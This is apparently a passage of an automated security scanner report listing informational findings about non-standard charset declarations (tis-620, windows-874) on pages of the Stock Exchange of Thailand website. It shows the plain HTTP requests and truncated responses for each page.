Last-Modified: Tue, 05 Apr 2011 11:13:45 GMT
ETag: "dc6f3-7c02-f8326c40"
Accept-Ranges: bytes
Content-Length: 31746
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.100. http://www.set.or.th/en/integrated-set.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /en/integrated-set.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/integrated-set.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=12

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:23 GMT
Server: Apache
Last-Modified: Tue, 03 Nov 2009 02:58:40 GMT
ETag: "dc701-2049-abd7d800"
Accept-Ranges: bytes
Content-Length: 8265
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.101. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:24 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 08:45:17 GMT
ETag: "7800a2-6911-a1aea140"
Accept-Ranges: bytes
Content-Length: 26897
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand - IPO Showc
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.102. http://www.set.or.th/en/products/index/setindex_p1.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /en/products/index/setindex_p1.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/products/index/setindex_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/regulations/cg/roles_p1.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:58:33 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 10:00:50 GMT
ETag: "124b84-7b8d-7a45f880"
Accept-Ranges: bytes
Content-Length: 31629
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand - Products
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.103. http://www.set.or.th/en/regulations/cg/roles_p1.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /en/regulations/cg/roles_p1.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/regulations/cg/roles_p1.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:47 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 10:16:10 GMT
ETag: "780163-5583-b11c0e80"
Accept-Ranges: bytes
Content-Length: 21891
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand - Supervisi
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.104. http://www.set.or.th/en/sitemap/for_listing.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /en/sitemap/for_listing.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/sitemap/for_listing.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:56 GMT
Server: Apache
Last-Modified: Wed, 30 Jun 2010 04:10:59 GMT
ETag: "78016f-6039-8a8a5ac0"
Accept-Ranges: bytes
Content-Length: 24633
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/noleftmenu-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand: You
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.105. http://www.set.or.th/head-en.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /head-en.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /head-en.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/regulations/cg/roles_p1.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 10:40:44 GMT
ETag: "cd18b-107f-8010c300"
Accept-Ranges: bytes
Content-Length: 4223
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's Capital Market</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.106. http://www.set.or.th/highlight/info_en.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /highlight/info_en.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /highlight/info_en.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=12

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:21 GMT
Server: Apache
Last-Modified: Thu, 21 Jan 2010 02:52:25 GMT
ETag: "135153-336-caf46c40"
Accept-Ranges: bytes
Content-Length: 822
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">
...[SNIP]...

32.107. http://www.set.or.th/highlight/info_th.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /highlight/info_th.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /highlight/info_th.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:00 GMT
Server: Apache
Last-Modified: Thu, 21 Jan 2010 02:52:25 GMT
ETag: "135152-32e-caf46c40"
Accept-Ranges: bytes
Content-Length: 814
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">
...[SNIP]...

32.108. http://www.set.or.th/highlight/pr-th.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /highlight/pr-th.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /highlight/pr-th.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/info_th.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:43 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 06:45:18 GMT
ETag: "134ed2-2038-7bb39b80"
Accept-Ranges: bytes
Content-Length: 8248
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.109. http://www.set.or.th/highlight/release_en_US.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /highlight/release_en_US.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /highlight/release_en_US.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/info_en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:26 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:48:01 GMT
ETag: "134ed6-12ca-63744640"
Accept-Ranges: bytes
Content-Length: 4810
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">
...[SNIP]...

32.110. http://www.set.or.th/nicepage_404.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /nicepage_404.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /nicepage_404.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/integrated-set.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:32 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 09:21:14 GMT
ETag: "cd18c-33cf-49161680"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.111. http://www.set.or.th/set/oppdaybyperiod.do  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /set/oppdaybyperiod.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=884D2D7AB4DAC6D78614FFFB7A7D8586; Path=/set
Content-Length: 118042


<html>
<head>
<link href="/set/styles/setstyle.css;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...

32.112. http://www.set.or.th/shortcut-en.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /shortcut-en.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /shortcut-en.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=12

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:10 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2010 02:25:49 GMT
ETag: "cd195-1ccb-44b8e540"
Accept-Ranges: bytes
Content-Length: 7371
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's Capital Market</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.113. http://www.set.or.th/shortcut-th.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /shortcut-th.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /shortcut-th.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:12 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2010 02:25:58 GMT
ETag: "498e9b-1e88-45423980"
Accept-Ranges: bytes
Content-Length: 7816
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's Capital Market</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.114. http://www.set.or.th/static/news/latestnews_en_US.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /static/news/latestnews_en_US.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /static/news/latestnews_en_US.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=12

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:14 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:48:00 GMT
ETag: "900fc-21ae-63650400"
Accept-Ranges: bytes
Content-Length: 8622
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">

...[SNIP]...

32.115. http://www.set.or.th/static/news/latestnews_th_TH.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /static/news/latestnews_th_TH.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /static/news/latestnews_th_TH.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:34 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:47:00 GMT
ETag: "ccab2-2483-5fd17d00"
Accept-Ranges: bytes
Content-Length: 9347
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">
fun
...[SNIP]...

32.116. http://www.set.or.th/th/index.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /th/index.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /th/index.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:24 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 11:14:17 GMT
ETag: "52c1e7-8902-fa1ab440"
Accept-Ranges: bytes
Content-Length: 35074
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.117. http://www.set.or.th/th/integrated-set.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /th/integrated-set.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /th/integrated-set.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:21 GMT
Server: Apache
Last-Modified: Tue, 03 Nov 2009 03:00:11 GMT
ETag: "534009-201a-b14464c0"
Accept-Ranges: bytes
Content-Length: 8218
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.118. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
